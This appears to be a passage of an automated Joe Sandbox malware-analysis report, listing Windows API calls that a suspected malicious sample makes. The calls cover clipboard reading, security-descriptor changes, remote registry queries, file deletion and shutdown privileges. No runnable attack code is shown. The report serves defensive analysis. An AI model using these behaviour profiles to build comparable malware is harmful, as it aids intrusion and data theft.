                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A71A99
                                                                                                                                                                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A71518
                                                                                                                                                                                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A7154C
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00A71563
                                                                                                                                                                                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00A7159D
                                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A715B9
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00A715D0
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A715D8
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00A715DF
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A71600
                                                                                                                                                                                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00A71607
                                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A71636
                                                                                                                                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A71658
                                                                                                                                                                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A7166A
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A71691
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A71698
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A716A1
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A716A8
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A716B1
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A716B8
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00A716C4
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A716CB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71ADF: GetProcessHeap.KERNEL32(00000008,00A714FD,?,00000000,?,00A714FD,?), ref: 00A71AED
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A714FD,?), ref: 00A71AF4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00A714FD,?), ref: 00A71B03
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1d932d178ba199818f711afc05d4790b415ca0eb7aacaffb31a7aa626c810203
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3058800c141d2015dcf32b68b439a5226708ca109f08feddb4aa1e690484c2aa
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d932d178ba199818f711afc05d4790b415ca0eb7aacaffb31a7aa626c810203
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9714CB290020AABDF10DFA9DC44FAEBBF9BF05741F18C515E95AA6190D731D906CBA0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00AADCD0), ref: 00A8F586
                                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00A8F594
                                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00A8F5A0
                                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00A8F5AC
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00A8F5E4
                                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00A8F5EE
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00A8F619
                                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00A8F626
                                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(00000001), ref: 00A8F62E
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00A8F63F
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00A8F67F
                                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 00A8F695
                                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(0000000F), ref: 00A8F6A1
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00A8F6B2
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00A8F6D4
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A8F6F1
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00A8F72F
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00A8F750
                                                                                                                                                                                                                                                                                                    • CountClipboardFormats.USER32 ref: 00A8F771
                                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00A8F7B6
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 420908878-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00A87403
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00A87457
                                                                                                                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A87493
                                                                                                                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A874BA
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A874F7
                                                                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A87524
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                                                    • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00A8A0A8
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00A8A0E6
                                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00A8A100
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00A8A118
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00A8A123
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00A8A13F
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00A8A18F
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00AD7B94), ref: 00A8A1AD
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A8A1B7
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00A8A1C4
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00A8A1D4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                                    • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A84785
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A847B2
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A847E2
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A84803
                                                                                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00A84813
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A8489A
• CloseHandle.KERNEL32(00000000), ref: 00A848A5
• CloseHandle.KERNEL32(00000000), ref: 00A848B0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
• String ID: :$\$\??\%s
• API String ID: 1149970189-3457252023
• Opcode ID: 6cccdede40b07ea2e99fb352f4fab4d592020b9b5b106ac995fc37018b5b4e65
• Instruction ID: 5cb3876ac24a0e0caf4a27691af2537897c123118b89d20116b441257246e5a9
• Opcode Fuzzy Hash: 6cccdede40b07ea2e99fb352f4fab4d592020b9b5b106ac995fc37018b5b4e65
• Instruction Fuzzy Hash: E431AF7190024AABDB21EBA0DC49FEB37BDEF8A744F1041B6F549D60A0EB709645CB64
APIs
• FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00A8A203
• FindNextFileW.KERNEL32(00000000,?), ref: 00A8A25E
• FindClose.KERNEL32(00000000), ref: 00A8A269
• FindFirstFileW.KERNEL32(*.*,?), ref: 00A8A285
• SetCurrentDirectoryW.KERNEL32(?), ref: 00A8A2D5
• SetCurrentDirectoryW.KERNEL32(00AD7B94), ref: 00A8A2F3
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00A8A2FD
• FindClose.KERNEL32(00000000), ref: 00A8A30A
• FindClose.KERNEL32(00000000), ref: 00A8A31A
  • Part of subcall function 00A7E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A7E3B4
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
• Opcode ID: 204cae938b7af2734cec5e34cd1deff93af940efbe5ded50f4a0d0099b3030e9
• Instruction ID: a43b2c09feb872aedaadbd2d47c2daeab151ad48e1e287bd4d5dc856f7759af5
• Opcode Fuzzy Hash: 204cae938b7af2734cec5e34cd1deff93af940efbe5ded50f4a0d0099b3030e9
• Instruction Fuzzy Hash: 2931D23150061A7AEB20FFB4DC09ADE77ACAF55324F104192F852A71E0EB71DE85CB61
APIs
  • Part of subcall function 00A9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A9C10E,?,?), ref: 00A9D415
  • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D451
  • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D4C8
  • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A9C99E
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00A9CA09
• RegCloseKey.ADVAPI32(00000000), ref: 00A9CA2D
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A9CA8C
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00A9CB47
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00A9CBB4
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00A9CC49
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00A9CC9A
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00A9CD43
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A9CDE2
• RegCloseKey.ADVAPI32(00000000), ref: 00A9CDEF
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
• String ID:
• API String ID: 3102970594-0
• Opcode ID: 329f332aebfb9132b80af77c88dd6d9775d92d3ac3a31edaabc97f5c42631de9
• Instruction ID: 960c3f71d545ac4c2692ed0f5567d4ce5257774319bf09fea5c1edb2d0f8905c
• Opcode Fuzzy Hash: 329f332aebfb9132b80af77c88dd6d9775d92d3ac3a31edaabc97f5c42631de9
• Instruction Fuzzy Hash: 78022071604600AFDB14DF28C995E2ABBF5EF49314F18849DF84ACB2A2DB31ED46CB51
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A155D1,?,?,00A54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A15871
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7EAB0: GetFileAttributesW.KERNEL32(?,00A7D840), ref: 00A7EAB1
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00A7D9CD
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00A7DA88
                                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00A7DA9B
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A7DAB8
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A7DAE2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00A7DAC7,?,?), ref: 00A7DB5D
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 00A7DAFE
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00A7DB0F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                                                                    • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3d234e7a62f7ada7aca647499de303cb5f92ff4eb4540e8f07af6064aee05b86
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5e2eb8f66c40448193c15b22bccb62831cf965f499372281ca6412787b1db114
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d234e7a62f7ada7aca647499de303cb5f92ff4eb4540e8f07af6064aee05b86
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6614D3180510DEECF05EBE0DE929EDB7B5AF55340F6480A9E44AB7191EB319F4ACB60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: b49ac1368e44259364389c4feb4a56b4d1cd955b16fc703ddb001025b9294747
                                                                                                                                                                                                                                                                                                    • Instruction ID: b7311a455407444c824de7e320a3af0551bc63cc048dbba5f108f1c48caf275b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b49ac1368e44259364389c4feb4a56b4d1cd955b16fc703ddb001025b9294747
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6741AF35A04612AFD310DF55D888F55BBE4FF45318F14C4A9E86A8FAA2CB35ED42CB90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A7205A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A72087
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72010: GetLastError.KERNEL32 ref: 00A72097
                                                                                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00A7F249
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                    • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                                                    • Opcode ID: ee46b0519b124fdd5917f4d5287f71b72f4a30ce0de5c9f93e19bdb73217a972
                                                                                                                                                                                                                                                                                                    • Instruction ID: 14c147800e7d1e5bb1cdd95f88a3c534bb26dc5a2acd696785e2dd599b9cc743
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee46b0519b124fdd5917f4d5287f71b72f4a30ce0de5c9f93e19bdb73217a972
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7701A27A7102116FEB1863A89D8ABFE726CAB09354F15C531FD07E21D2E6604E0192E0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4BD54
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4BD78
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4BEFF
                                                                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00AB46D0), ref: 00A4BF11
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00AE221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00A4BF89
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00AE2270,000000FF,?,0000003F,00000000,?), ref: 00A4BFB6
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4C0CB
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 314583886-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: e7bbe59c434255034e8a61661cdbde8d4953445687aa5606c51cefdc48fda337
                                                                                                                                                                                                                                                                                                    • Instruction ID: 02bd3e7a757a75c35790dcd38202610bd15ff960e657afeee858caf95ae19a7d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7bbe59c434255034e8a61661cdbde8d4953445687aa5606c51cefdc48fda337
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72C12879910245AFDB24DF78CD41BEABBB9EFC1310F1445AAE5859B291E730CE42CB60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A556C2,?,?,00000000,00000000), ref: 00A83A1E
                                                                                                                                                                                                                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00A556C2,?,?,00000000,00000000), ref: 00A83A35
                                                                                                                                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00A556C2,?,?,00000000,00000000,?,?,?,?,?,?,00A166CE), ref: 00A83A45
                                                                                                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00A556C2,?,?,00000000,00000000,?,?,?,?,?,?,00A166CE), ref: 00A83A56
                                                                                                                                                                                                                                                                                                    • LockResource.KERNEL32(00A556C2,?,?,00A556C2,?,?,00000000,00000000,?,?,?,?,?,?,00A166CE,?), ref: 00A83A65
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                                    • String ID: SCRIPT
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A71916
